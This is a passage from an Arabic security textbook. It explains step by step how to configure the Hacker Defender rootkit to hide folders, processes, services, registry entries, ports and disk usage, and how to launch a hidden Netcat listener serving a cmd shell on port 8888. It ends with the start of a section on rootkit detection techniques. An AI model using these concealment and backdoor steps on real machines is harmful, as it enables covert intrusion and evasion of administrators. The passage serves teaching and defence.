‫اﻹﻣﻛﺎن‪ ،‬ﻓﻣن اﻷﻓﺿل إﻧﺷﺎء ﻣﺟﻠد واﺣد ﻋﻠﻰ ﺟذر ﻣﺣرك اﻷﻗراص اﻟﮭدف اﻟﺑﺎرﺗش اﻟذي ﯾﺣﻣل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز )‪.(partition C‬‬
‫ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﺳوف ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﻋﻠﻰ اﻟﻣﺣرك )\‪(C:‬ﯾدﻋﻰ “‪ .(for rootkit) ”rk‬ﯾﺗم وﺿﻊ ﻛﺎﻓﺔ اﻟﻣﻠﻔﺎت ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫‪ hxdef100.zip‬وﻣﺣﺗوﯾﺎﺗﮫ اﻟﻐﯾر ﻣﺿﻐوطﺔ داﺧل ھذا اﻟﻣﺟﻠد‪ .‬ھذا ﺳﯾﺟﻌل ﻣن اﻻﺳﮭل ﺗﺗﺑﻊ اﻟﻣﻠﻔﺎت‪ ،‬وﺗوﻓﯾر ﻣوﻗﻊ ﻣرﻛزي ﻟﺗﺣﻣﯾل أدوات‬
‫إﺿﺎﻓﯾﺔ‪ ،‬وﺟﻌل إﺧﻔﺎء ھذا اﻟﻣﺳﺗودع اﻟﻣرﻛزي أﺳﮭل ﺑﻛﺛﯾر‪ .‬وﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻓك ﺿﻐط ﻣﻠف ‪ ،hxdef100‬ﯾﻣﻛﻧك أن ﺗﺑدأ ﻓﻲ إﻋداد‬
‫‪ Hacker Defender‬ﻋن طرﯾﻖ ﺗﻌدﯾل اﻟﻣﻠف ‪.hxdef100.ini‬‬
‫ﺑﻣﺟرد ﻓﺗﺢ اﻟﻣﻠف ‪ ،.ini‬ﺳﺗرى ﻋدد ﻣن اﻷﻗﺳﺎم اﻟﻣﺧﺗﻠﻔﺔ‪ .‬ﯾﺑدأ ﻛل ﻗﺳم رﺋﯾﺳﻲ ﻣﻊ اﺳم ﻣﻐﻠﻖ ﻓﻲ ﻗوس ﻣرﺑﻊ‪ .‬وﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻟﻣﻠف‬
‫اﻟﺗﻛوﯾن‪/‬اﻻﻋداد اﻻﻓﺗراﺿﻲ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪442‬‬

‫ﻛﻣﺎ ﺗرون ﻣن اﻟﺷﻛل اﻟﺳﺎﺑﻖ‪ ،‬ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻌﻧﺎوﯾن ﺑﻣﺎ ﻓﻲ ذﻟك ]اﻟﺟدول ﻣﺧﻔﻲ)‪] ،[ (hidden table‬اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪(hidden process‬‬
‫[‪] ،‬ﻋﻣﻠﯾﺎت اﻟﺟذر)‪] ،[ (root process‬اﻟﺧدﻣﺎت اﻟﻣﺧﻔﯾﺔ)‪ ،[ (hidden services‬وﻏﯾرھﺎ‪ .‬ﺳﺗﻼﺣظ أﯾﺿﺎ أن ﻣﻠف ﺗﻛوﯾن ‪Hacker‬‬
‫‪ Defender‬ﯾﺗﺿﻣن زوﺟﯾن ﻣن اﻹدﺧﺎﻻت اﻻﻓﺗراﺿﯾﺔ‪ .‬ﺗﺳﺗﺧدم ھذه اﻹدﺧﺎﻻت ﻹﺧﻔﺎء ﻣﻠﻔﺎت ‪ Hacker Defender‬واﻟﺗﻲ ﺑﻧﯾت ﻓﻲ‬
‫‪ backdoor‬ﻟذﻟك ﻟم ﯾﻛن ﻟدﯾك ﻟﺗﻌدﯾل ھذه أو إﺟراء ﺗﻐﯾﯾرات إﺿﺎﻓﯾﺔ‪ .‬ﻻﺣظ أﯾﺿﺎ أن اﻟﻣﻠف ‪ ini‬ﯾدﻋم اﺳﺗﺧدام أﺣرف ‪ wildcards‬ﻣﻊ‬
‫اﻟﺣرف "*"‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬أي اﻟﻣﻠف ﯾﺑدأ ﺑﺎﻟﺣروف ‪ hxdef‬ﺳﯾﺗم إﺿﺎﻓﺗﮫ ﺗﻠﻘﺎﺋﯾﺎ اﻟﻰ اﻟﻘﺎﺋﻣﺔ‪.‬‬

‫طرﯾﻘﺔ اﻟﻌﻣل ﺑداﯾﺔ ﻣن اﻟﺟزء اﻟﻌﻠوي ﻣن ﺧﻼل ﻛل اﻟﻌﻧﺎوﯾن‪ .‬ﯾﺣﻣل ﻋﻧوان اﻟﻘﺳم اﻷول ]اﻟﺟدول اﻟﻣﺧﻔﻲ)‪ .[ (hidden table‬أي ﻣن اﻟﻣﻠﻔﺎت‬
‫أو اﻟﻣﺳﺎرات أو اﻟﻣﺟﻠدات اﻟﻣدرﺟﺔ ﻓﻲ إطﺎر ھذا اﻟﺑﻧد ﺳوف ﺗﻛون ﻣﺧﻔﯾﺔ ﻣن اﻟﻣﺳﺗﻛﺷف )‪ (explorer‬وﻣدﯾر اﻟﻣﻠﻔﺎت )‪(file manager‬‬
‫اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ‪ .Windows‬إذا ﻗﻣت ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﻋﻠﻰ ﺟذر ﻣﺣرك اﻷﻗراص ﻛﻣﺎ اﻗﺗرح ﻓﻲ وﻗت ﺳﺎﺑﻖ‪ ،‬ﺗﺄﻛد ﻣن إدراﺟﮫ ھﻧﺎ‪ .‬ﺑﻧﺎء ﻋﻠﻰ‬
‫اﻟﻣﺟﻠد اﻟذي ﻗﻣﻧﺎ ﺑﺈﻧﺷﺎﺋﮫ ﻓﻲ اﻟﻣﺛﺎل اﻟﺳﺎﺑﻖ‪ ،‬ﻓﺳوف ﻧﻘوم ﺑﺈدراج "‪ " rk‬ﻓﻲ اﻟﻣﻘطﻊ ]اﻟﺟدول اﻟﻣﺧﻔﻲ)‪.[ (hidden table‬‬

‫ﻓﻲ اﻟﻣﻘطﻊ ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪ ،[ (hidden process‬ﺳوف ﺗﻘوم ﺑﺳرد ﻗﺎﺋﻣﺔ ﻛل ﻣن اﻟﻌﻣﻠﯾﺎت أو اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗرﯾد أن ﺗﻛون ﻣﺧﺑﺄة ﻋن‬
‫اﻟﻣﺳﺗﺧدم‪ .‬ﻛل ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﻣذﻛورة ھﻧﺎ ﺳوف ﺗﻛون ﻣﺧﻔﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم اﻟﻣﺣﻠﻲ ﻋﻧد ﻋرض اﻟﻌﻣﻠﯾﺎت ﻗﯾد اﻟﺗﺷﻐﯾل ﺣﺎﻟﯾﺎ ﻣﻊ ﻣدﯾر اﻟﻣﮭﻣﺎت‬
‫)‪ .(task manager‬ﻛﻣﺛﺎل‪ ،‬ﻧﻔﺗرض أﻧك ﺗرﯾد إﺧﻔﺎء ﺑرﻧﺎﻣﺞ اﻵﻟﺔ اﻟﺣﺎﺳﺑﺔ‪ .‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﺳوف ﺗﺣﺗﺎج ﻟﺳرد ﺑرﻧﺎﻣﺞ اﻟﺣﺎﺳﺑﺔ ﺗﺣت اﻟﻣﻘطﻊ‬
‫]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪ .[ (hidden process‬ﺑﺈﺿﺎﻓﺔ ‪ calc.exe‬إﻟﻰ اﻟﻣﻘطﻊ ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪ ،[ (hidden process‬ﻓﺈن اﻟﻣﺳﺗﺧدم ﻟن ﯾﻛون‬
‫ﻗﺎدرا ﻋﻠﻰ اﻟﻌﺛور أو اﻟﺗﻔﺎﻋل ﻣﻊ ﺑرﻧﺎﻣﺞ اﻵﻟﺔ اﻟﺣﺎﺳﺑﺔ‪ .‬ﺑﻣﺟرد ﺑدء ‪ rootkit‬ﻟدﯾﻧﺎ‪ ،‬ﻓﻠن ﯾوﺟد أي ﺑرﻧﺎﻣﺞ آﻟﺔ ﺣﺎﺳﺑﺔ ﻣﺗوﻓرة ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪.‬‬

‫ﯾﺳﺗﺧدم اﻟﻘﺳم ]ﻋﻣﻠﯾﺎت اﻟﺟذر)‪ ،[ (root process‬ﻟﻠﺳﻣﺎح ﻟﺑراﻣﺞ ﻣﻌﯾﻧﮫ ﻟﻠﺗﻔﺎﻋل ﻣﻊ وﻋرض اﻟﻣﺟﻠدات واﻟﻌﻣﻠﯾﺎت اﻟﻣﺧﻔﯾﺔ ﺳﺎﺑﻘﺎ‪ .‬ﺗذﻛر أﻧﮫ ﻓﻲ‬
‫اﻷﺟزاء اﻟﺳﺎﺑﻘﺔ‪ ،‬ﻛﻧﺎ ﻗد ازاﻟﻧﺎ ﻗدرة ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻟﻠﻛﺷف ﻋن‪ ،‬اﻟﻧظر‪ ،‬واﻟﺗﻔﺎﻋل ﻣﻊ ﻣﺧﺗﻠف اﻟﻣﻠﻔﺎت واﻟﺑراﻣﺞ‪ .‬ﻓﻲ ھذا اﻟﻘﺳم‪ ،‬ﻧﻘوم ﺑﺳرد‬
‫ﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ اﻟﺗﻲ ﻧرﯾدھﺎ ان ﺗﺣﺻل ﻋﻠﻰ اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ‪ .‬ﺑﺣﯾث ﯾﺳﻣﺢ ﻟﻠﺑراﻣﺞ اﻟﻣذﻛورة ھﻧﺎ ﻟﻣﺷﺎھدة واﻟﺗﻔﺎﻋل ﻣﻊ ﺑراﻣﺞ ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺑﻣﺎ‬
‫ﻓﻲ ذﻟك ﺗﻠك اﻟواردة ﻓﻲ ]اﻟﺟدول اﻟﻣﺧﻔﻲ)‪ [ (hidden table‬و ]اﻟﻌﻣﻠﯾﺎت اﻟﺧﻔﯾﺔ )‪.[ (hidden process‬‬

‫إذا ﻛﺎن ﻟدﯾك أي ﻣن اﻟﺑراﻣﺞ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ اﻟﺗﺛﺑﯾت ﻛﺧدﻣﺔ أو ﺗﺷﻐﯾل اﻟﺧدﻣﺎت ﻣﺛل ﺑروﺗوﻛول ﻧﻘل اﻟﻣﻠﻔﺎت‪ ،‬ﺧوادم اﻟﺷﺑﻛﺔ‪،backdoor ،‬‬
‫وﻣﺎ إﻟﻰ ذﻟك‪ ،‬ﻓﺳوف ﺗﺣﺗﺎج إﻟﻰ إدراﺟﮭﺎ ﻓﻲ اﻟﻘﺳم ]اﻟﺧدﻣﺎت اﻟﻣﺧﻔﯾﺔ)‪ .[ (hidden services‬ﻣﺛل ﻛل اﻷﻗﺳﺎم أﺧرى‪ ،‬ﻓﺈن اﻟﻘﺳم ]اﻟﺧدﻣﺎت‬
‫اﻟﻣﺧﻔﯾﺔ[ ﯾﻘوم ﺑﺈﺧﻔﺎء ﻛل ﻣن اﻟﺧدﻣﺎت اﻟﻣذﻛورة‪ .‬ﻣرة أﺧرى‪ ،‬ﻋﻧد اﻟﺗﻌﺎﻣل ﻣﻊ ﻣدﯾر اﻟﻣﮭﻣﺎت)‪ ، (task manger‬ﺳﯾﺗم أﺧﻔﺎء أي ﻣن اﻟﺑرﻧﺎﻣﺞ‬
‫اﻟﻣذﻛورة ھﻧﺎ ﻣن "ﻗﺎﺋﻣﺔ اﻟﺧدﻣﺎت"‪.‬‬

‫ﯾﻣﻛﻧك اﺳﺗﺧدام ]‪ [Hidden REGKEYS‬ﻹﺧﻔﺎء ﻣﻔﺎﺗﯾﺢ ﺗﺳﺟﯾل )‪ (REGKEY‬ﻣﻌﯾﻧﺔ‪ .‬ﺗﻘرﯾﺑﺎ ﺟﻣﯾﻊ ﺑراﻣﺞ إﻧﺷﺎء ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻋﻧد‬
‫ﺗرﻛﯾﺑﮭﺎ أو ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ .‬ﻗﺳم ]‪ [Hidden REGKEYS‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻹﺧﻔﺎء ﻛل ﻣن ھذه اﻟﻣﻔﺎﺗﯾﺢ‪ .‬وﺳوف ﺗﺣﺗﺎج إﻟﻰ‬
‫اﻟﺗﺄﻛد ﻣن ذﻛرھﺎ ﺟﻣﯾﻌﺎ ﻣن أﺟل ﺗﺟﻧب اﻟﻛﺷف‪.‬‬
‫ﺑﻌض اﻟﺣﺎﻻت ﺗﺗطﻠب ﺳﯾطرة أﻛﺛر ﻣن ﻣﺟرد إﺧﻔﺎء ﻣﻔﺎﺗﯾﺢ ﺑﺄﻛﻣﻠﮫ‪ .‬إذا ﻛﺎن اﻟﻣﻔﺗﺎح ﻣﻔﻘود )أو ﻣﺧﻔﻰ(‪ ،‬ﻓﺎن ﻣﺳؤول اﻟﻧظﺎم ﻗد ﯾﺷﺗﺑﮫ ﻓﻲ ذﻟك‪.‬‬
‫ﻟﻠﺗﻌﺎﻣل ﻣﻊ ھذه اﻟﺣﺎﻻت‪ ،‬ﻓﺎن ‪ Hacker Defender‬ﯾﺳﻣﺢ ﻟﻧﺎ ﺑﺎﺳﺗﺧدام اﻟﻘﺳم ]‪ [Hidden RegValues‬وھذا ﺳوف ﯾﻘوم ﺑﺈﺧﻔﺎء اﻟﻘﯾم‬
‫اﻟﻔردﯾﺔ ﺑدﻻ ﻣن اﻟﻣﻔﺗﺎح ﺑﺄﻛﻣﻠﮫ‪.‬‬

‫اﻟﻘﺳم ]‪ [Startup Run‬ھﻲ ﻗﺎﺋﻣﺔ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺳوف ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ ﺑﻣﺟرد ﺑدأ ‪ .Hacker Defender‬وھذا ﺳﯾﻛون ﻣﻛﺎﻧﺎ ﺟﯾدا ﻟﺳرد‬
‫اﻷﻣر ‪ Netcat‬ﻟو ﻛﻧت ﻣﮭﺗﻣﺎ ﺑﺈﻧﺷﺎء ﻣﺟﻣوﻋﺔ ‪ .backdoor‬ﻓﻘط ﺗﺄﻛد ﻣن وﺿﻌﮫ ﻓﻲ وﺿﻊ اﻟﻣﺳﺗﻣﻊ)‪. (Listener mode‬‬

‫ﺗﻣﺎﻣﺎ ﻣﺛل ﺗﺛﺑﯾت اﻟﺑراﻣﺞ ﻋﻠﻰ ﺟﮭﺎز وﯾﻧدوز واﻟﺗﻲ ﺗﻘوم ﺗﻠﻘﺎﺋﯾﺎ ﺑﺈﻧﺷﺎء ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل واﻟﻘﯾم‪ ،‬ﺗرﻛﯾب اﻟﺑراﻣﺞ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﯾﺗطﻠب‬
‫ﻣﺳﺎﺣﺔ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ھﻧﺎ ﻣرة أﺧرى‪ ،‬ﻣﺳؤول اﻟﻧﺎظم ﯾﻣﻛﻧﮫ أن ﯾﻼﺣظ إذا ﻗﻣت ﺑﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﯾﺗطﻠب اﻟﻛﺛﯾر ﻣن ﻣﺳﺎﺣﺔ اﻟﻘرص‪ .‬إذا‬
‫ﻛﺎن اﻟﻣﺳﺗﺧدم ﯾﺑدأ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮫ ﻓﻲ ﺻﺑﺎح أﺣد اﻷﯾﺎم وﯾﻛﺗﺷف أن أﻛﺛر ﻣن ﻧﺻف ﻣﺳﺎﺣﺔ اﻟﻘرص اﻟﺻﻠب ﻓﺟﺄة ﺗم اﺳﺗﺧداﻣﮭﺎ‪،‬‬
‫ﻓﺎن ھذا ﺳوف ﯾﺛﯾر ﺑﻌض اﻟﺷﺑﮭﺎت ﻟدﯾﮫ‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام اﻟﻣﻘطﻊ ]‪ [Free Space‬ﻟدﻓﻊ اﻟﻛﻣﺑﯾوﺗر إﻟﻰ " إﺿﺎﻓﺔ ﻣرة أﺧرى " ﻛﻣﯾﺔ اﻟﻣﺳﺎﺣﺔ‬
‫اﻟﺣرة اﻟﺗﻲ ﺗم اﺳﺗﺧدﻣﺗﮭﺎ‪ .‬ﺑﺣﯾث إدﺧﺎل رﻗم ھﻧﺎ ﺳوف ﯾﻔرض ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑﺎﻹﺑﻼغ ﻋن اﻟﻣﺳﺎﺣﺔ اﻟﺣرة اﻟﻣﺗوﻓرة اﻟﻔﻌﻠﯾﺔ ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ اﻟرﻗم‬
‫اﻟذي ﻗﻣت ﺑﺈدﺧﺎﻟﮫ ﻓﻲ ھذا اﻟﻘﺳم‪ .‬ﺑﻌﺑﺎرة أﺧرى‪ ،‬إذا ﻗﻣت ﺑﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ ﯾﺗطﻠب ‪ 1‬ﻏﯾﻐﺎﺑﺎﯾت ﻣن اﻟﻣﺳﺎﺣﺔ اﻟﺣرة‪ ،‬ﻓﺈﻧك ﯾﺟب أن ﺗﺿﯾف‬
‫‪ 1073741824‬ﻓﻲ اﻟﻘﺳم ]‪ .[Free Space‬وﺑذﻟك ﯾﻘﻠل ﻣن اﺣﺗﻣﺎل اﻻﻛﺗﺷﺎف‪ .‬ﯾرﺟﻰ ﻣﻼﺣظﺔ أن ﯾﺗم ﺳرد ھذا اﻟرﻗم ﻓﻲ ﺻورة ﺑﺎﯾت‪ .‬إذا‬
‫ﻛﻧت ﺑﺣﺎﺟﺔ إﻟﻰ ﻣﺳﺎﻋدة ﻓﻲ ﺗﺣوﯾل اﻟﻣﺳﺎﺣﺔ ﻣن ﺑﺎﯾت إﻟﻰ ﻛﯾﻠو ﺑﺎﯾت إﻟﻰ ﻏﯾﻐﺎ ﺑﺎﯾت ﻣﯾﻐﺎ ﺑﺎﯾت‪ ،‬ﻓﮭﻧﺎك اﻟﻌدﯾد ﻣن اﻵﻻت اﻟﺣﺎﺳﺑﺔ اﻟﺟﯾدة‬
‫اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﺑﺑﺳﺎطﺔ ﺟوﺟل " ﺣﺎﺳﺑﺔ ﻛﯾﻠو ﺑﺎﯾت إﻟﻰ ﻣﯾﻐﺎﺑﺎﯾت "‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪443‬‬

‫إذا ﻛﻧت ﺗﻌرف اﻟﻣﻧﺎﻓذ اﻟﺗﻲ ﺗﺧطط ﻟﻔﺗﺣﮭﺎ‪ ،‬ﯾﻣﻛﻧك إدراﺟﮭﺎ ﺿﻣن اﻟﻣﻘطﻊ ]‪ .[Hidden Ports‬ﺳﺗﻼﺣظ أن ھذا اﻟﻘﺳم ﯾﻧﻘﺳم أﯾﺿﺎ إﻟﻰ‬
‫اﻹدﺧﺎﻻت اﻟﺗﺎﻟﯾﺔ‪ ،TCPO ،TCPI :‬و‪ ":TCPI" .UDP‬ھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺗم ﻓﯾﮫ ﺳرد اﻟﻣﻧﺎﻓذ اﻟواردة )‪ (Inbound Ports‬اﻟﺗﻲ ﺗرﯾد‬
‫إﺧﻔﺎﺋﮭﺎ ﻋن اﻟﻣﺳﺗﺧدم‪ .‬إذا ﻛﺎن ﻟدﯾك ﻣﻧﺎﻓذ ﻣﺗﻌددة ﺗرﯾد وﺿﻌﮭﺎ ھﻧﺎ‪ ،‬ﺑﺑﺳﺎطﺔ ﯾﻔﺻل ﺑﯾﻧﮭﻣﺎ ﻓﺎﺻﻠﺔ‪ ":TCPO" .‬ھذا ھو اﻟﻣﻛﺎن اﻟذي ﯾﺳرد ﻓﯾﮫ‬
‫ﻣﻧﺎﻓذ ‪ TCP‬اﻟﺻﺎدرة اﻟﺗﻲ ﺗرﯾد أن ﺗﻛون ﻣﺧﻔﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم‪ ":UDP" .‬ﯾﺳﺗﺧدم ھذا اﻟﻘﺳم ﻟﺗﺣدﯾد ﻣﻧﺎﻓذ ‪ UDP‬اﻟذي ﺗرﯾد إﺧﻔﺎؤھﺎ‪.‬‬

‫اﻵن أﺻﺑﺢ ﻟدﯾك ﻓﻛرة ﻋن ﻛﯾﻔﯾﺔ ﺗﻛوﯾن إﻋدادات ‪ Hacker Defender‬اﻷﺳﺎﺳﯾﺔ‪ ،‬دﻋوﻧﺎ ﻧﻔﺣص اﻷداة ﻓﻲ اﻟﻌﻣل‪ .‬ﻟﮭذا اﻟﻣﺛﺎل‪ ،‬ﺳوف ﻧﻘوم‬
‫ﺑﺗﺛﺑﯾت ‪ Hacker Defender‬ﻓﻲ اﻟﻣﺟﻠد ﻋﻠﻰ ﻣﺣرك اﻷﻗراص اﻟﺟذري \‪ C:‬واﻟذي ﯾﺳﻣﻰ "‪ ."rk‬ﺳوف ﻧﺿﻊ أﯾﺿﺎ ﻧﺳﺧﺔ ﻣن ‪ Netcat‬ﻓﻲ‬
‫ھذا اﻟﻣﺟﻠد‪ .‬ﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻋﻠﻰ ﻣﻠف اﻻﻋداد‪.‬‬

‫ﺳﺗﻼﺣظ أﻧﮫ ﻟﯾس ھﻧﺎك ﺳوى ﺑﺿﻌﺔ أﺳطر إﺿﺎﻓﯾﺔ ﺗم إﺿﺎﻓﺗﮭﺎ إﻟﻰ ﻣﻠف اﻟﺗﻛوﯾن اﻻﻓﺗراﺿﻲ‪ .‬ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬ﻗﻣﻧﺎ ﺑﺈﺿﺎﻓﺔ اﻟﻣﺟﻠد "‪ "rk‬إﻟﻰ‬
‫اﻟﻣﻘطﻊ ]‪ ،[Hidden Table‬واﻟﻣﻠف ﻗﺎﺑل ﻟﻠﺗﻧﻔﯾذ ‪ Netcat‬إﻟﻰ اﻟﻣﻘطﻊ ]‪ ،[Hidden Process‬وأﺧﯾرا‪ ،‬إﻋداد ‪ Netcat‬ﻟﻠﺑدء ﺗﻠﻘﺎﺋﯾﺎ ﻓﻲ‬
‫وﺿﻊ اﻟﻣﻠﻘم وﺗوﻓﯾر طرﻓﯾﺔ ‪ cmd‬ﻓﻲ اﻟﻣﻧﻔذ ‪ 8888‬ﻣن اﻟﮭدف‪ .‬إذا أردت إﺿﺎﻓﺔ طﺑﻘﺔ إﺿﺎﻓﯾﺔ ﻟﺗﺄﻛﯾد اﻻﺧﺗﻔﺎء‪ ،‬ﯾﻣﻛن ذﻟك ﻣن ﺧﻼل إﺿﺎﻓﺔ‬
‫‪ 8888‬إﻟﻰ اﻟﻣﻘطﻊ ]‪.[Hidden Ports‬‬
‫اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﯾظﮭر اﺛﻧﯾن ﻣن اﻟﻠﻘطﺎت ﻗﺑل ﺑدء ﻋﻣل ‪ .hacker Defender‬ﻻﺣظ أن ﻛﻼ ﻣن اﻟﻣﺟﻠد "‪ "rk‬واﻟﺑرﻧﺎﻣﺞ )‪Netcat (nc.exe‬‬
‫ﻣرﺋﻲ‪.‬‬

‫وﻣﻊ ذﻟك‪ ،‬ﺑﻣﺟرد ﺗﺷﻐﯾل‪/‬ﺗﻧﻔﯾذ اﻟﻣﻠف ‪ ،hxdef100.exe‬ﻓﺎن ‪ Rootkits‬ﯾﺻﺑﺢ ﻓﻲ اﻟﻘوة اﻟﻛﺎﻣﻠﺔ‪ .‬ﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ أن ﻛل ﻣن اﻟﻣﺟﻠد‬
‫"‪ "rk‬واﻟﺑرﻧﺎﻣﺞ "‪ "nc.exe‬أﺻﺑﺣﺎ ﻏﯾر ﻣرﺋﯾﯾن ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪444‬‬

‫ﻛﻣﺎ ﺗرون‪ ،‬ﺣﺗﻰ اﻟﺟذور أﺑﺳط ‪ Rootkits‬ﻣﺛل ‪ Hacker Defender‬ﻗﺎدرة ﺗﻣﺎﻣﺎ ﻋﻠﻰ اﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ Rootkits .‬ھﻲ ﻣوﺿوع واﺳﻊ‬
‫وﻧﺣن ﯾﻣﻛن ﺑﺳﮭوﻟﺔ ﺗﺧﺻﯾص ﻛﺗﺎب ﻛﺎﻣل إﻟﻰ اﻟﺗﻔﺎﺻﯾل اﻟﻔﻧﯾﺔ وﺗرﻛﯾﺑﺗﮭﺎ واﻷﻋﻣﺎل اﻟداﺧﻠﯾﺔ‪ .‬ﺗﻛﻧوﻟوﺟﯾﺎ ‪ ،Rootkits‬ﻣﺛل ﻛل اﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺧﺑﯾﺛﺔ‪ ،‬ﺗواﺻل ﺗطوﯾر ﺑوﺗﯾرة ﻣذھﻠﺔ‪ .‬ﻣن أﺟل إﺗﻘﺎن ‪ ،Rootkits‬ﻓﺳوف ﺗﺣﺗﺎج ﻟﻠﺑدا ﻓﻲ اﻟﻔﮭم اﻟﺳﻠﯾم ﻟﻧواة ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن‬
‫ﺗﻐطﯾﺔ اﻷﺳﺎﺳﯾﺎت‪ ،‬وﯾﺷﺟﻊ ﺑﺷدة ﻟك اﻟﻐوص ﻓﻲ ‪ malware rabbit hole‬وﻧرى ﻛﯾف ﺳﺗﺳﯾر اﻻﻣور اﻟﻌﻣﯾﻘﺔ‪.‬‬

‫‪Detecting Rootkits‬‬
‫ﺗﺻﻧف ﺗﻘﻧﯾﺎت اﻟﻛﺷف ﻋن اﻟروت ﻛت ﻛﺎﻻﺗﻰ‪،cross-view-based ،integrity ،heuristic ،signature ،‬‬
‫و‪.Runtime Execution Path Profiling‬‬
‫‪Signature-based Detection‬‬
‫طرﯾﻘﺔ اﻟﻛﺷف اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ ‪ Signature‬ﺗﻌﻣل وﻛﺄﻧﮭﺎ ﺑﺻﻣﺔ اﻟروت ﻛت‪ .‬ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑذﻟك ﻋن طرﯾﻖ ﻣﻘﺎرﻧﺔ ﺗﺳﻠﺳل ﺑﺎﯾت ﻣن ﻣﻠف ﻣﻘﺎرﻧﺔ‬
‫ﻣﻊ ﺗﺳﻠﺳل ﺑﺎﯾت ﻟﻣﻠف آﺧر ﯾﻧﺗﻣﻲ إﻟﻰ ﺑرﻧﺎﻣﺞ ﺧﺑﯾث)‪ . (malware program‬ﯾﺳﺗﺧدم ھذا اﻷﺳﻠوب ﻓﻲ اﻟﻐﺎﻟب ﻋﻠﻰ ﻣﻠﻔﺎت اﻟﻧظﺎم‪ .‬اﻟروت‬
‫ﻛت ﺗﻛون داﺋﻣﺎ ﻏﯾر ﻣرﺋﯾﺔ وﯾﻣﻛن اﻟﻛﺷف ﺑﺳﮭوﻟﺔ ﻋﻧﮭﺎ ﻋن طرﯾﻖ ﻓﺣص ذاﻛرة ‪ .kernel‬ﻓرص ﻧﺟﺎح اﻟﻛﺷف اﻟﻘﺎﺋم ﻋﻠﻰ ‪Signature‬‬
‫ﻗﻠﯾﻠﮫ ﻧظرا ﻟﻣﯾل اﻟروت ﻛت ﻹﺧﻔﺎء اﻟﻣﻠﻔﺎت ﻋن طرﯾﻖ ﻗطﻊ ﻣﺳﺎر اﻟﺗﻧﻔﯾذ ﻟﻠﺑراﻣﺞ اﻟﻛﺷف‪.‬‬
‫‪Heuristic Detection‬‬
‫‪ Heuristic detection‬ﯾﻌﻣل ﻋن طرﯾﻖ ﺗﺣدﯾد اﻻﻧﺣراﻓﺎت ﻓﻲ أﻧﻣﺎط ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﻌﺎدﯾﺔ أو اﻟﺳﻠوﻛﯾﺎت‪ .‬ھذا اﻟﻧوع ﻣن اﻟﻛﺷف ﯾﻌرف‬
